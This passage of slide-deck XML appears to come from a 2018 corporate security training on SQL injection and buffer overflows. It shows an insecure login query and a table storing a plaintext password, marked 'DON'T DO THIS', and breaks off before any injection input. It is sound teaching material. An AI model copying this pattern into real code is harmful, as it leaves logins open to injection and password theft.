              <a:t>http://evreeves.org/wp-content/uploads/2013/08/Overflow.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>NOP Sled: </a:t>
            </a:r>
            <a:r>
              <a:t>https://i.imgur.com/K6WT20K.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Would You Like To Know More?: </a:t>
            </a:r>
            <a:r>
              <a:t>https://static1.squarespace.com/static/574f0b9a37013b939ab0b866/t/5936b0e717bffc7a44df2ca0/1496756488470/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Roberto:</a:t>
            </a:r>
            <a:r>
              <a:t> https://1bigslug.deviantart.com/art/Futurama-Roberto-450218001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2653" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="11997266" y="211666"/>
            <a:ext cx="1" cy="12581479"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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4"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425"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426" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-77920" y="1858678"/>
            <a:ext cx="24539841" cy="4814959"/>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429" name="SELECT *…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7358558" y="2226219"/>
            <a:ext cx="7988152" cy="4079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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  u.username=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'rich'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:t> u.password=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'12345'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="We’ll talk about storing passwords properly later."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15984616" y="3521232"/>
            <a:ext cx="5600577" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We’ll talk about storing passwords properly later.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="15751084" y="4018632"/>
            <a:ext cx="985001" cy="1271823"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="22454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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="DON’T DO THIS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="358292"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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DON’T DO THIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="434" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1179249" y="8703288"/>
          <a:ext cx="22271843" cy="2236187"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1065417"/>
                <a:gridCol w="3026846"/>
                <a:gridCol w="11468929"/>
                <a:gridCol w="6710648"/>
              </a:tblGrid>
              <a:tr h="1118092">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>email</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1118092">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>rich</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>12345</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mj-ea"/>
                          <a:cs typeface="+mj-cs"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>rich@pagerduty.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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46" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8885585" y="688271"/>
            <a:ext cx="6612831" cy="5257201"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6612829" cy="5257199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="440" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6612830" cy="5257200"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="6612829" cy="5257199"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="438" name="frame.png" descr="frame.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="6612830" cy="5257200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="439" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="260436" y="940886"/>
                <a:ext cx="6091958" cy="4095901"/>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solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="441" name="Login"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2731442" y="907853"/>
              <a:ext cx="1149946" cy="625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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Login</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="442" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="2319418"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="443" name="Username"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420584" y="1691723"/>
              <a:ext cx="1678720" cy="536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600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Password"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420584" y="3257500"/>
              <a:ext cx="1605360" cy="536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600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="445" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="3865684"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="447"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448"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449" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10187" y="6612198"/>
            <a:ext cx="24404376" cy="4814960"/>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452" name="SELECT *…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543795" y="6979740"/>
            <a:ext cx="8170020" cy="4079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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  u.username='     '</a:t>
            </a:r>
          </a:p>
          <a:p>
